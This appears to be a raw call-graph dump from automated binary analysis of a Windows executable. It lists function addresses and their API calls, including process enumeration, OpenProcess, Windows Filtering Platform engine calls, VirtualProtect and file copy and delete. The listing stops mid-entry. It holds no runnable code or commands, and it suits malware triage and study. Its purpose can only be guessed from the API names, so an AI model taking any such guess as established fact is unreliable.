11088->11087 11089 7ff73afbdf21 11088->11089 11097 7ff73afbd5bc 11089->11097 11091 7ff73afbe2e0 11092 7ff73afbe301 11091->11092 11093 7ff73afbccd9 2 API calls 11091->11093 11093->11092 11094 7ff73afbccd9 fputwc fwprintf 11094->11095 11095->11091 11095->11094 11096 7ff73afbcacd 10 API calls 11095->11096 11096->11095 11102 7ff73afbd5d3 11097->11102 11098 7ff73afbd7aa 11101 7ff73afbca90 fputwc 11098->11101 11099 7ff73afbd76b 11099->11098 11100 7ff73afbca90 fputwc 11099->11100 11100->11098 11103 7ff73afbd7b7 11101->11103 11102->11099 11105 7ff73afbca90 fputwc 11102->11105 11104 7ff73afbca90 fputwc 11103->11104 11106 7ff73afbd7c8 11104->11106 11105->11102 11107 7ff73afbca90 fputwc 11106->11107 11108 7ff73afbd7ce 11106->11108 11107->11106 11110 7ff73afbcc72 7 API calls 11108->11110 11111 7ff73afbca90 fputwc 11108->11111 11114 7ff73afbccd9 2 API calls 11108->11114 11115 7ff73afbd815 11108->11115 11109 7ff73afbd861 11113 7ff73afbca90 fputwc 11109->11113 11110->11108 11111->11108 11112 7ff73afbca90 fputwc 11112->11115 11116 7ff73afbd875 11113->11116 11114->11108 11115->11109 11115->11112 11117 7ff73afc0689 GetProcessHeap 10157 7ff73afc0088 ___lc_codepage_func ___mb_cur_max_func 10158 7ff73afc00f1 10157->10158 10159 7ff73afc00b7 10157->10159 10160 7ff73afc00c3 10159->10160 10163 7ff73afc00bc 10159->10163 10160->10158 10164 7ff73afbffd0 10160->10164 10161 7ff73afbffd0 2 API calls 10161->10163 10163->10158 10163->10161 10165 7ff73afbfff4 WideCharToMultiByte 10164->10165 10166 7ff73afbffe4 10164->10166 10165->10166 10167 7ff73afc0034 _errno 10165->10167 10166->10167 10168 7ff73afbffeb 10166->10168 10167->10168 10168->10160 11515 7ff73afba5a1 inet_addr 11525 7ff73afbfd98 11526 7ff73afbf663 6 API calls 11525->11526 11527 7ff73afbfdb4 11526->11527 10184 7ff73afbc49e 10185 7ff73afbc4a7 10184->10185 10186 7ff73afbb593 strlen 10185->10186 10191 7ff73afbc382 10186->10191 10187 7ff73afbca67 10188 7ff73afbb3e7 fputc 10188->10191 10189 7ff73afbb593 strlen 10189->10191 10190 7ff73afbc475 wcslen 10190->10191 10191->10187 10191->10188 10191->10189 10191->10190 10192 7ff73afbb420 5 API calls 10191->10192 10192->10191 11528 7ff73afbc59e 11529 7ff73afbc5b4 11528->11529 11537 7ff73afbc130 11529->11537 11531 7ff73afbca67 11532 7ff73afbb3e7 fputc 11535 7ff73afbc382 11532->11535 11533 7ff73afbb593 strlen 11533->11535 11534 7ff73afbc475 wcslen 11534->11535 11535->11531 11535->11532 11535->11533 11535->11534 11536 7ff73afbb420 5 API calls 11535->11536 11536->11535 11538 7ff73afbc141 11537->11538 11546 7ff73afbb2d0 11538->11546 11541 7ff73afbc186 11543 7ff73afbb5da fputc 11541->11543 11542 7ff73afbc193 11550 7ff73afbc08a 11542->11550 11545 7ff73afbc191 11543->11545 11545->11535 11547 7ff73afbb2ee 11546->11547 11548 7ff73afbe4e0 6 API calls 11547->11548 11549 7ff73afbb3e1 11548->11549 11549->11541 11549->11542 11551 7ff73afbc0ac 11550->11551 11556 7ff73afbb721 11551->11556 11554 7ff73afbb3e7 fputc 11555 7ff73afbc118 11554->11555 11559 7ff73afbb73d 11556->11559 11557 7ff73afbb78e 11558 7ff73afbb3e7 fputc 11557->11558 11564 7ff73afbb82b 11557->11564 11558->11564 11559->11557 11561 7ff73afbb3e7 fputc 11559->11561 11560 7ff73afbb831 11562 7ff73afbb83a 11560->11562 11563 7ff73afbb867 11560->11563 11561->11559 11565 7ff73afbb3e7 fputc 11562->11565 11567 7ff73afbb3e7 fputc 11563->11567 11568 7ff73afbb8bc 11563->11568 11572 7ff73afbb420 5 API calls 11563->11572 11564->11560 11566 7ff73afbb3e7 fputc 11564->11566 11565->11568 11566->11564 11567->11563 11569 7ff73afbb64c 11 API calls 11568->11569 11575 7ff73afbb8d0 11568->11575 11569->11575 11570 7ff73afbb8e8 11571 7ff73afbb910 11570->11571 11574 7ff73afbb3e7 fputc 11570->11574 11571->11554 11572->11563 11573 7ff73afbb3e7 fputc 11573->11575 11574->11570 11575->11570 11575->11573 10193 7ff73afb749c 10194 7ff73afb74fd 10193->10194 10195 7ff73afb74bd 10193->10195 10198 7ff73afb14e2 12 API calls 10194->10198 10196 7ff73afb74c2 10195->10196 10197 7ff73afb7536 10195->10197 10199 7ff73afb756f 10196->10199 10200 7ff73afb74d6 strlen strlen 10196->10200 10201 7ff73afb14e2 12 API calls 10197->10201 10203 7ff73afb7526 10198->10203 10202 7ff73afb14e2 12 API calls 10199->10202 10200->10203 10201->10203 10202->10203 11126 7ff73afc06b1 GetLastError 11592 7ff73afbddaf 11593 7ff73afbddb3 11592->11593 11594 7ff73afbd1bd fputwc 11593->11594 11597 7ff73afbdb86 11593->11597 11594->11597 11595 7ff73afbe2e0 11596 7ff73afbe301 11595->11596 11598 7ff73afbccd9 2 API calls 11595->11598 11597->11595 11599 7ff73afbccd9 fputwc fwprintf 11597->11599 11600 7ff73afbcacd 10 API calls 11597->11600 11598->11596 11599->11597 11600->11597 11601 7ff73afbe1b5 11602 7ff73afbe1bd localeconv 11601->11602 11607 7ff73afbdb86 11601->11607 11603 7ff73afc026c 6 API calls 11602->11603 11603->11607 11604 7ff73afbccd9 fputwc fwprintf 11604->11607 11605 7ff73afbe2e0 11606 7ff73afbe301 11605->11606 11609 7ff73afbccd9 2 API calls 11605->11609 11607->11604 11607->11605 11608 7ff73afbcacd 10 API calls 11607->11608 11608->11607 11609->11606 10584 7ff73afc03ab ___mb_cur_max_func ___lc_codepage_func 10585 7ff73afc03da 10584->10585 10586 7ff73afc0150 4 API calls 10585->10586 10587 7ff73afc03f9 10586->10587 10588 7ff73afb37c0 10589 7ff73afb1cf4 14 API calls 10588->10589 10590 7ff73afb37d0 10589->10590 10591 7ff73afb1c73 14 API calls 10590->10591 10597 7ff73afb3816 10590->10597 10592 7ff73afb37e4 10591->10592 10593 7ff73afb3820 GetLastError 10592->10593 10594 7ff73afb37fc 10592->10594 10592->10597 10596 7ff73afb14e2 12 API calls 10593->10596 10595 7ff73afb14e2 12 API calls 10594->10595 10595->10597 10596->10597 11624 7ff73afb5dc4 11625 7ff73afb5de5 11624->11625 11626 7ff73afb5deb CloseHandle 11625->11626 11627 7ff73afb5df4 11625->11627 11626->11627 10218 7ff73afbc4b9 10219 7ff73afbc4c7 10218->10219 10220 7ff73afbc50e 10219->10220 10221 7ff73afbc4fe 10219->10221 10238 7ff73afbb9b0 10220->10238 10230 7ff73afbbbb4 10221->10230 10224 7ff73afbca67 10225 7ff73afbb3e7 fputc 10228 7ff73afbc382 10225->10228 10226 7ff73afbb593 strlen 10226->10228 10227 7ff73afbc475 wcslen 10227->10228 10228->10224 10228->10225 10228->10226 10228->10227 10229 7ff73afbb420 5 API calls 10228->10229 10229->10228 10231 7ff73afbbbe6 10230->10231 10232 7ff73afbbd06 10231->10232 10237 7ff73afbb3e7 fputc 10231->10237 10233 7ff73afbbd86 10232->10233 10235 7ff73afbb3e7 fputc 10232->10235 10234 7ff73afbbda2 10233->10234 10236 7ff73afbb3e7 fputc 10233->10236 10234->10228 10235->10232 10236->10233 10237->10231 10239 7ff73afbba02 10238->10239 10240 7ff73afbbb66 10239->10240 10243 7ff73afbb3e7 fputc 10239->10243 10241 7ff73afbbb7f 10240->10241 10244 7ff73afbb3e7 fputc 10240->10244 10242 7ff73afbbba6 10241->10242 10245 7ff73afbb3e7 fputc 10241->10245 10242->10228 10243->10239 10244->10240 10245->10241 10607 7ff73afb1bbb 10608 7ff73afb1bf4 10607->10608 10609 7ff73afb1bcc 10607->10609 10610 7ff73afb14e2 12 API calls 10608->10610 10611 7ff73afb14e2 12 API calls 10609->10611 10612 7ff73afb1bd1 10609->10612 10610->10612 10611->10612 11127 7ff73afba6d0 11128 7ff73afba6f7 11127->11128 11129 7ff73afba763 fprintf 11128->11129 11632 7ff73afbc5cf 11633 7ff73afbc5e5 11632->11633 11641 7ff73afbb919 11633->11641 11635 7ff73afbca67 11636 7ff73afbb3e7 fputc 11639 7ff73afbc382 11636->11639 11637 7ff73afbb593 strlen 11637->11639 11638 7ff73afbc475 wcslen 11638->11639 11639->11635 11639->11636 11639->11637 11639->11638 11640 7ff73afbb420 5 API calls 11639->11640 11640->11639 11642 7ff73afbb92a 11641->11642 11643 7ff73afbb2d0 6 API calls 11642->11643 11644 7ff73afbb957 11643->11644 11645 7ff73afbb979 11644->11645 11646 7ff73afbb96c 11644->11646 11647 7ff73afbb721 11 API calls 11645->11647 11648 7ff73afbb5da fputc 11646->11648 11651 7ff73afbb984 11647->11651 11649 7ff73afbb977 11648->11649 11649->11639 11650 7ff73afbb3e7 fputc 11650->11651 11651->11649 11651->11650 10631 7ff73afb6fd5 10632 7ff73afb6feb GetSystemTimeAsFileTime 10631->10632 10633 7ff73afb6fe0 10631->10633 10632->10633 10634 7ff73afba3e1 10635 7ff73afba3f9 10634->10635 10636 7ff73afba43e 10634->10636 10638 7ff73afba46e 10635->10638 10639 7ff73afba3fe 10635->10639 10637 7ff73afb14e2 12 API calls 10636->10637 10644 7ff73afba41b 10637->10644 10640 7ff73afb14e2 12 API calls 10638->10640 10641 7ff73afb9ed0 14 API calls 10639->10641 10640->10644 10642 7ff73afba411 10641->10642 10643 7ff73afba4a1 strlen GetProcessHeap HeapAlloc 10642->10643 10642->10644 10645 7ff73afba4d3 10643->10645 10646 7ff73afba52d 10643->10646 10645->10644 10648 7ff73afba4db strlen 10645->10648 10647 7ff73afb14e2 12 API calls 10646->10647 10647->10645 10652 7ff73afb6e61 10648->10652 10651 7ff73afba511 GetProcessHeap HeapFree 10651->10644 10653 7ff73afb6e71 10652->10653 10654 7ff73afb6e93 10652->10654 10655 7ff73afb6ec6 10653->10655 10656 7ff73afb6e76 10653->10656 10657 7ff73afb14e2 12 API calls 10654->10657 10658 7ff73afb14e2 12 API calls 10655->10658 10659 7ff73afb6ef9 10656->10659 10661 7ff73afb6e7c 10656->10661 10663 7ff73afb6e85 10657->10663 10658->10663 10660 7ff73afb14e2 12 API calls 10659->10660 10660->10663 10662 7ff73afb14e2 12 API calls 10661->10662 10661->10663 10662->10663 10663->10644 10663->10651 10664 7ff73afbafe1 strlen 10665 7ff73afbb043 10664->10665 10666 7ff73afbaff9 10664->10666 10666->10665 10667 7ff73afbb026 strncmp 10666->10667 10667->10665 10667->10666 11148 7ff73afc06e1 FreeLibrary 11677 7ff73afb65e3 11678 7ff73afb6684 11677->11678 11679 7ff73afb65f9 11677->11679 11682 7ff73afb14e2 12 API calls 11678->11682 11680 7ff73afb6602 11679->11680 11681 7ff73afb66b4 11679->11681 11683 7ff73afb66e4 11680->11683 11684 7ff73afb660e strlen 11680->11684 11685 7ff73afb14e2 12 API calls 11681->11685 11689 7ff73afb66ad 11682->11689 11686 7ff73afb14e2 12 API calls 11683->11686 11687 7ff73afb6620 11684->11687 11684->11689 11685->11689 11686->11689 11688 7ff73afb6640 strlen 11687->11688 11690 7ff73afb662f strlen 11687->11690 11696 7ff73afb743a 11688->11696 11694 7ff73afb14e2 12 API calls 11689->11694 11690->11688 11692 7ff73afb6656 strlen 11693 7ff73afb14e2 12 API calls 11692->11693 11695 7ff73afb667a 11693->11695 11694->11695 11697 7ff73afb7456 11696->11697 11697->11692 11698 7ff73afb89d9 11699 7ff73afb8a13 CloseHandle 11698->11699 11709 7ff73afb860e 11699->11709 11700 7ff73afb8669 Process32Next 11701 7ff73afb867d GetLastError 11700->11701 11700->11709 11701->11709 11702 7ff73afb8ca5 CloseHandle 11703 7ff73afb8cb5 11702->11703 11704 7ff73afb14e2 12 API calls 11704->11709 11705 7ff73afba1f1 17 API calls 11705->11709 11706 7ff73afb88cd OpenProcess 11707 7ff73afb8a78 GetLastError 11706->11707 11708 7ff73afb88ee QueryFullProcessImageNameW 11706->11708 11711 7ff73afb14e2 12 API calls 11707->11711 11708->11709 11710 7ff73afb892e GetLastError 11708->11710 11709->11699 11709->11700 11709->11702 11709->11704 11709->11705 11709->11706 11713 7ff73afb8153 44 API calls 11709->11713 11712 7ff73afb14e2 12 API calls 11710->11712 11711->11709 11712->11709 11713->11709 11714 7ff73afc05d9 SetUnhandledExceptionFilter 11715 7ff73afbadd8 11716 7ff73afbadf3 11715->11716 11717 7ff73afbae3e 11715->11717 11716->11717 11718 7ff73afbae0d EnterCriticalSection LeaveCriticalSection 11716->11718 11718->11717 11156 7ff73afc02d7 11157 7ff73afc02f6 11156->11157 11158 7ff73afc02fd ___lc_codepage_func ___mb_cur_max_func 11156->11158 11157->11158 11159 7ff73afc0318 11158->11159 11164 7ff73afc0358 11158->11164 11160 7ff73afc0323 11159->11160 11163 7ff73afc0361 11159->11163 11159->11164 11161 7ff73afc0150 4 API calls 11160->11161 11160->11164 11161->11160 11162 7ff73afc0150 4 API calls 11162->11163 11163->11162 11163->11164 10303 7ff73afbdcdd strerror 10304 7ff73afbcfc8 strlen 10303->10304 10306 7ff73afbdb86 10304->10306 10305 7ff73afbe2e0 10307 7ff73afbe301 10305->10307 10308 7ff73afbccd9 2 API calls 10305->10308 10306->10305 10309 7ff73afbccd9 fputwc fwprintf 10306->10309 10310 7ff73afbcacd 10 API calls 10306->10310 10308->10307 10309->10306 10310->10306 10677 7ff73afbc3dc 10678 7ff73afbb3e7 fputc 10677->10678 10683 7ff73afbc382 10678->10683 10679 7ff73afbca67 10680 7ff73afbb3e7 fputc 10680->10683 10681 7ff73afbb593 strlen 10681->10683 10682 7ff73afbc475 wcslen 10682->10683 10683->10679 10683->10680 10683->10681 10683->10682 10684 7ff73afbb420 5 API calls 10683->10684 10684->10683 10685 7ff73afbc3f0 10686 7ff73afbc423 10685->10686 10692 7ff73afbc382 10685->10692 10694 7ff73afbb4fe 10686->10694 10688 7ff73afbb420 5 API calls 10688->10692 10689 7ff73afbca67 10690 7ff73afbb3e7 fputc 10690->10692 10691 7ff73afbb593 strlen 10691->10692 10692->10688 10692->10689 10692->10690 10692->10691 10693 7ff73afbc475 wcslen 10692->10693 10693->10692 10695 7ff73afbb516 10694->10695 10696 7ff73afbb3e7 fputc 10695->10696 10698 7ff73afbb523 10695->10698 10696->10695 10697 7ff73afbb56e 10700 7ff73afbb58a 10697->10700 10701 7ff73afbb3e7 fputc 10697->10701 10698->10697 10699 7ff73afbb3e7 fputc 10698->10699 10699->10698 10700->10692 10701->10697 11719 7ff73afc05e9 RemoveDirectoryA 10702 7ff73afbc7ec 10707 7ff73afbc382 10702->10707 10703 7ff73afbca67 10704 7ff73afbb3e7 fputc 10704->10707 10705 7ff73afbb593 strlen 10705->10707 10706 7ff73afbc475 wcslen 10706->10707 10707->10703 10707->10704 10707->10705 10707->10706 10708 7ff73afbb420 5 API calls 10707->10708 10708->10707 10709 7ff73afb1001 10710 7ff73afb103c __set_app_type 10709->10710 10712 7ff73afb10a9 10710->10712 11736 7ff73afbc600 11737 7ff73afbc616 11736->11737 11745 7ff73afbc1ae 11737->11745 11739 7ff73afbca67 11740 7ff73afbb3e7 fputc 11743 7ff73afbc382 11740->11743 11741 7ff73afbb593 strlen 11741->11743 11742 7ff73afbc475 wcslen 11742->11743 11743->11739 11743->11740 11743->11741 11743->11742 11744 7ff73afbb420 5 API calls 11743->11744 11744->11743 11746 7ff73afbc1c0 11745->11746 11747 7ff73afbb2d0 6 API calls 11746->11747 11748 7ff73afbc1f8 11747->11748 11749 7ff73afbc21f 11748->11749 11750 7ff73afbc20d 11748->11750 11752 7ff73afbc290 11749->11752 11755 7ff73afbc235 11749->11755 11751 7ff73afbb5da fputc 11750->11751 11759 7ff73afbc21a 11751->11759 11753 7ff73afbc294 11752->11753 11754 7ff73afbc29b strlen 11752->11754 11758 7ff73afbc08a 11 API calls 11753->11758 11754->11753 11756 7ff73afbc241 strlen 11755->11756 11757 7ff73afbc239 11755->11757 11756->11757 11760 7ff73afbb721 11 API calls 11757->11760 11758->11759 11759->11743 11761 7ff73afbc274 11760->11761 11761->11759 11762 7ff73afbb3e7 fputc 11761->11762 11762->11761 10318 7ff73afb58fa 10323 7ff73afb5189 10318->10323 10322 7ff73afb590f 10324 7ff73afb5219 CopyFileA 10323->10324 10328 7ff73afb51b1 10323->10328 10325 7ff73afb5242 GetLastError 10324->10325 10324->10328 10326 7ff73afb14e2 12 API calls 10325->10326 10327 7ff73afb526c 10326->10327 10329 7ff73afb14e2 12 API calls 10327->10329 10328->10327 10331 7ff73afb51e8 10328->10331 10330 7ff73afb53ba 10329->10330 10330->10330 10332 7ff73afb14e2 12 API calls 10331->10332 10333 7ff73afb5209 10332->10333 10333->10322 10334 7ff73afb4bbd 10333->10334 10335 7ff73afb4bd4 DeleteFileA 10334->10335 10343 7ff73afb4bde 10334->10343 10336 7ff73afb4c2b GetLastError 10335->10336 10335->10343 10337 7ff73afb14e2 12 API calls 10336->10337 10337->10343 10338 7ff73afb4d5a 10339 7ff73afb14e2 12 API calls 10338->10339 10341 7ff73afb4d7c 10339->10341 10340 7ff73afb4c0a 10342 7ff73afb14e2 12 API calls 10340->10342 10341->10341 10344 7ff73afb4c20 10342->10344 10343->10338 10343->10340 10344->10322 10345 7ff73afbdcf8 10346 7ff73afbdd06 10345->10346 10347 7ff73afbdd4f 10346->10347 10348 7ff73afbdd3f 10346->10348 10365 7ff73afbd1bd 10347->10365 10357 7ff73afbd3c1 10348->10357 10351 7ff73afbe2e0 10352 7ff73afbe301 10351->10352 10353 7ff73afbccd9 2 API calls 10351->10353 10353->10352 10354 7ff73afbdb86 10354->10351 10355 7ff73afbcacd 10 API calls 10354->10355 10356 7ff73afbccd9 fputwc fwprintf 10354->10356 10355->10354 10356->10354 10358 7ff73afbd3f3 10357->10358 10359 7ff73afbd513 10358->10359 10364 7ff73afbca90 fputwc 10358->10364 10360 7ff73afbd593 10359->10360 10362 7ff73afbca90 fputwc 10359->10362 10361 7ff73afbd5af 10360->10361 10363 7ff73afbca90 fputwc 10360->10363 10361->10354 10362->10359 10363->10360 10364->10358 10366 7ff73afbd20f 10365->10366 10367 7ff73afbd373 10366->10367 10369 7ff73afbca90 fputwc 10366->10369 10368 7ff73afbd38c 10367->10368 10370 7ff73afbca90 fputwc 10367->10370 10371 7ff73afbd3b3 10368->10371 10372 7ff73afbca90 fputwc 10368->10372 10369->10366 10370->10367 10371->10354 10372->10368 11770 7ff73afbddf7 11771 7ff73afbde0d 11770->11771 11779 7ff73afbd93d 11771->11779 11773 7ff73afbe301 11774 7ff73afbe2e0 11774->11773 11775 7ff73afbccd9 2 API calls 11774->11775 11775->11773 11776 7ff73afbdb86 11776->11774 11777 7ff73afbccd9 fputwc fwprintf 11776->11777 11778 7ff73afbcacd 10 API calls 11776->11778 11777->11776 11778->11776 11780 7ff73afbd94e 11779->11780 11781 7ff73afbd00f 6 API calls 11780->11781 11782 7ff73afbd97e 11781->11782 11783 7ff73afbd9a0 11782->11783 11784 7ff73afbd993 11782->11784 11786 7ff73afbd897 9 API calls 11783->11786 11785 7ff73afbcc00 10 API calls 11784->11785 11787 7ff73afbd99e 11785->11787 11786->11787 11787->11776 9174 7ff73afb12fd 9177 7ff73afb1131 9174->9177 9178 7ff73afb115a 9177->9178 9179 7ff73afb1172 9178->9179 9180 7ff73afb1169 Sleep 9178->9180 9181 7ff73afb1194 9179->9181 9182 7ff73afb1188 _amsg_exit 9179->9182 9180->9178 9183 7ff73afb11b5 9181->9183 9184 7ff73afb119a _initterm 9181->9184 9182->9183 9185 7ff73afb11c5 _initterm 9183->9185 9186 7ff73afb11de 9183->9186 9184->9183 9185->9186 9198 7ff73afba96b 9186->9198 9189 7ff73afb122e 9190 7ff73afb1233 malloc 9189->9190 9191 7ff73afb1253 9190->9191 9192 7ff73afb1283 9191->9192 9193 7ff73afb1258 strlen malloc 9191->9193 9209 7ff73afb14b8 9192->9209 9193->9191 9195 7ff73afb12c4 9196 7ff73afb12e3 _cexit 9195->9196 9197 7ff73afb12e8 9195->9197 9196->9197 9199 7ff73afb1208 SetUnhandledExceptionFilter 9198->9199 9201 7ff73afba989 9198->9201 9199->9189 9200 7ff73afbab8f 9200->9199 9203 7ff73afbabb7 VirtualProtect 9200->9203 9201->9200 9202 7ff73afbaa00 9201->9202 9204 7ff73afbaa3f 9201->9204 9202->9200 9205 7ff73afbaa1e 9202->9205 9203->9200 9204->9200 9207 7ff73afbaaaa 9204->9207 9205->9202 9213 7ff73afba824 9205->9213 9208 7ff73afba824 3 API calls 9207->9208 9208->9204 9210 7ff73afb14c8 9209->9210 9220 7ff73afb1486 9210->9220 9215 7ff73afba84a 9213->9215 9214 7ff73afba953 9214->9205 9215->9214 9216 7ff73afba8af VirtualQuery 9215->9216 9217 7ff73afba8d8 9216->9217 9217->9214 9218 7ff73afba907 VirtualProtect 9217->9218 9218->9214 9219 7ff73afba93f GetLastError 9218->9219 9219->9214 9227 7ff73afb1360 9220->9227 9223 7ff73afb1496 9246 7ff73afb1432 9223->9246 9277 7ff73afb19c0 GetModuleHandleExA 9227->9277 9232 7ff73afb1393 9292 7ff73afb168c InitializeCriticalSectionAndSpinCount 9232->9292 9236 7ff73afb19c0 14 API calls 9237 7ff73afb13cb 9236->9237 9238 7ff73afb6c99 18 API calls 9237->9238 9239 7ff73afb13e7 9238->9239 9339 7ff73afb6497 9239->9339 9242 7ff73afb13f6 9245 7ff73afb13a1 9242->9245 9345 7ff73afb97f2 9242->9345 9245->9223 9254 7ff73afb9621 9245->9254 9524 7ff73afb193c 9246->9524 9249 7ff73afb1452 9251 7ff73afb1475 9249->9251 9252 7ff73afb145e GetProcessHeap HeapFree 9249->9252 9250 7ff73afb1446 9531 7ff73afb6263 9250->9531 9251->9195 9252->9251 9255 7ff73afb9650 9254->9255 9256 7ff73afb96b0 9255->9256 9257 7ff73afb9656 9255->9257 9258 7ff73afb14e2 12 API calls 9256->9258 9545 7ff73afb76d0 9257->9545 9260 7ff73afb96c6 9258->9260 9260->9223 9262 7ff73afb966e 9264 7ff73afb9672 9262->9264 9265 7ff73afb9d2d 13 API calls 9262->9265 9263 7ff73afb76d0 14 API calls 9263->9262 9266 7ff73afb96fc FwpmEngineClose0 9264->9266 9559 7ff73afb9d2d 9264->9559 9267 7ff73afb96ef 9265->9267 9266->9260 9267->9266 9269 7ff73afb9722 9267->9269 9569 7ff73afb855d 9267->9569 9269->9266 9271 7ff73afb9d2d 13 API calls 9269->9271 9273 7ff73afb9737 9271->9273 9272 7ff73afb96ac 9272->9266 9273->9264 9273->9266 9595 7ff73afb8cfc 9273->9595 9278 7ff73afb19f2 GetLastError 9277->9278 9279 7ff73afb1376 9277->9279 9393 7ff73afb14e2 9278->9393 9281 7ff73afb6c99 9279->9281 9282 7ff73afb6cdf 9281->9282 9283 7ff73afb6caf 9281->9283 9284 7ff73afb14e2 12 API calls 9282->9284 9440 7ff73afb6b9b 9283->9440 9290 7ff73afb138f 9284->9290 9287 7ff73afb6d0f strlen 9288 7ff73afb6d21 9287->9288 9289 7ff73afb6d37 strcat strlen 9287->9289 9288->9289 9291 7ff73afb6d26 strlen 9288->9291 9289->9290 9290->9232 9316 7ff73afb5e6f 9290->9316 9291->9289 9293 7ff73afb17e0 GetLastError 9292->9293 9294 7ff73afb16ba 9292->9294 9295 7ff73afb14e2 12 API calls 9293->9295 9296 7ff73afb19c0 14 API calls 9294->9296 9301 7ff73afb17b9 9295->9301 9297 7ff73afb16d6 9296->9297 9298 7ff73afb6b9b 14 API calls 9297->9298 9299 7ff73afb16ea 9298->9299 9300 7ff73afb16f4 strlen 9299->9300 9299->9301 9303 7ff73afb1723 9300->9303 9304 7ff73afb170d 9300->9304 9302 7ff73afb14e2 12 API calls 9301->9302 9305 7ff73afb139d 9302->9305 9307 7ff73afb1748 strlen fopen 9303->9307 9308 7ff73afb1728 strcat strlen 9303->9308 9304->9303 9306 7ff73afb1712 strlen 9304->9306 9305->9236 9305->9245 9306->9303 9309 7ff73afb1797 9307->9309 9310 7ff73afb18ad 9307->9310 9308->9307 9311 7ff73afb14e2 12 API calls 9309->9311 9312 7ff73afb14e2 12 API calls 9310->9312 9313 7ff73afb17b1 9311->9313 9312->9301 9313->9301 9314 7ff73afb191d 9313->9314 9315 7ff73afb14e2 12 API calls 9314->9315 9315->9305 9317 7ff73afb5f72 9316->9317 9318 7ff73afb5e86 9316->9318 9319 7ff73afb14e2 12 API calls 9317->9319 9320 7ff73afb5fa2 9318->9320 9321 7ff73afb5e8f CreateFileA 9318->9321 9322 7ff73afb5f27 9319->9322 9323 7ff73afb14e2 12 API calls 9320->9323 9324 7ff73afb5fd5 GetLastError 9321->9324 9325 7ff73afb5eda LockFileEx 9321->9325 9331 7ff73afb6239 9322->9331 9332 7ff73afb5f51 9322->9332 9323->9322 9328 7ff73afb14e2 12 API calls 9324->9328 9326 7ff73afb60ba GetLastError 9325->9326 9327 7ff73afb5f0e 9325->9327 9330 7ff73afb14e2 12 API calls 9326->9330 9327->9322 9329 7ff73afb622b CloseHandle 9327->9329 9336 7ff73afb5ff6 9328->9336 9329->9331 9337 7ff73afb60db 9330->9337 9334 7ff73afb14e2 12 API calls 9331->9334 9333 7ff73afb14e2 12 API calls 9332->9333 9335 7ff73afb5f67 9333->9335 9334->9335 9335->9232 9336->9326 9338 7ff73afb6163 9336->9338 9337->9338 9338->9329 9340 7ff73afb64a0 GetFileAttributesA 9339->9340 9341 7ff73afb64b5 9339->9341 9343 7ff73afb64e5 GetLastError 9340->9343 9344 7ff73afb13ef 9340->9344 9342 7ff73afb14e2 12 API calls 9341->9342 9342->9344 9343->9344 9344->9242 9367 7ff73afb433b 9344->9367 9346 7ff73afb98a5 9345->9346 9347 7ff73afb981a 9345->9347 9348 7ff73afb14e2 12 API calls 9346->9348 9468 7ff73afb45d5 9347->9468 9362 7ff73afb9833 9348->9362 9350 7ff73afb9854 9352 7ff73afb9b92 9350->9352 9356 7ff73afb987c 9350->9356 9351 7ff73afb983d GetProcessHeap HeapFree 9351->9350 9353 7ff73afb14e2 12 API calls 9352->9353 9355 7ff73afb9bb4 9353->9355 9354 7ff73afb995d GetProcessHeap HeapAlloc 9357 7ff73afb99d0 9354->9357 9363 7ff73afb999a 9354->9363 9366 7ff73afb14e2 12 API calls 9355->9366 9359 7ff73afb14e2 12 API calls 9356->9359 9358 7ff73afb14e2 12 API calls 9357->9358 9358->9363 9361 7ff73afb9892 9359->9361 9361->9245 9362->9350 9362->9351 9363->9362 9364 7ff73afb9ab3 strncpy strncpy 9363->9364 9365 7ff73afb9b28 strncpy 9363->9365 9364->9363 9365->9363 9366->9355 9368 7ff73afb43e5 9367->9368 9369 7ff73afb435a 9367->9369 9370 7ff73afb14e2 12 API calls 9368->9370 9371 7ff73afb4415 9369->9371 9372 7ff73afb4363 fopen 9369->9372 9382 7ff73afb4388 9370->9382 9373 7ff73afb14e2 12 API calls 9371->9373 9374 7ff73afb4374 9372->9374 9375 7ff73afb4448 _errno 9372->9375 9373->9382 9376 7ff73afb44d6 fwrite 9374->9376 9374->9382 9377 7ff73afb14e2 12 API calls 9375->9377 9380 7ff73afb44f8 _errno 9376->9380 9381 7ff73afb44ee 9376->9381 9378 7ff73afb4470 _errno 9377->9378 9383 7ff73afb4479 9378->9383 9384 7ff73afb44bd _errno 9378->9384 9379 7ff73afb459a 9387 7ff73afb14e2 12 API calls 9379->9387 9386 7ff73afb14e2 12 API calls 9380->9386 9381->9380 9382->9379 9385 7ff73afb43bb 9382->9385 9383->9384 9384->9376 9388 7ff73afb14e2 12 API calls 9385->9388 9389 7ff73afb4520 _errno 9386->9389 9390 7ff73afb43d8 9387->9390 9388->9390 9391 7ff73afb4529 9389->9391 9392 7ff73afb456d _errno 9389->9392 9390->9242 9391->9392 9392->9379 9394 7ff73afb14f0 9393->9394 9404 7ff73afbb210 9394->9404 9397 7ff73afb1577 fwrite fflush 9400 7ff73afb15a0 9397->9400 9398 7ff73afb15ac EnterCriticalSection 9399 7ff73afb15c6 LeaveCriticalSection 9398->9399 9401 7ff73afb15e3 9398->9401 9399->9397 9400->9279 9402 7ff73afb161d CopyFileA 9401->9402 9403 7ff73afb1655 9402->9403 9403->9399 9405 7ff73afbb235 9404->9405 9406 7ff73afbb21e 9404->9406 9407 7ff73afbc2d0 7 API calls 9405->9407 9410 7ff73afbc2d0 9406->9410 9409 7ff73afb1549 9407->9409 9409->9397 9409->9398 9409->9400 9414 7ff73afbc307 9410->9414 9411 7ff73afbca67 9411->9409 9412 7ff73afbb3e7 fputc 9412->9414 9414->9411 9414->9412 9415 7ff73afbc475 wcslen 9414->9415 9417 7ff73afbb420 9414->9417 9427 7ff73afbb593 9414->9427 9415->9414 9431 7ff73afc0047 9417->9431 9419 7ff73afbb44f 9425 7ff73afbb462 9419->9425 9436 7ff73afbb3e7 9419->9436 9421 7ff73afbb4d1 9423 7ff73afbb4ed 9421->9423 9424 7ff73afbb3e7 fputc 9421->9424 9422 7ff73afc0047 4 API calls 9422->9425 9423->9414 9424->9421 9425->9421 9425->9422 9426 7ff73afbb3e7 fputc 9425->9426 9426->9425 9428 7ff73afbb5a3 9427->9428 9429 7ff73afbb5c1 strlen 9428->9429 9430 7ff73afbb5ba 9428->9430 9429->9430 9432 7ff73afc0053 9431->9432 9433 7ff73afc0058 ___mb_cur_max_func ___lc_codepage_func 9431->9433 9432->9433 9434 7ff73afbffd0 WideCharToMultiByte _errno 9433->9434 9435 7ff73afc0080 9434->9435 9435->9419 9437 7ff73afbb3f8 9436->9437 9438 7ff73afbb410 9437->9438 9439 7ff73afbb409 fputc 9437->9439 9438->9419 9439->9438 9441 7ff73afb6be2 9440->9441 9442 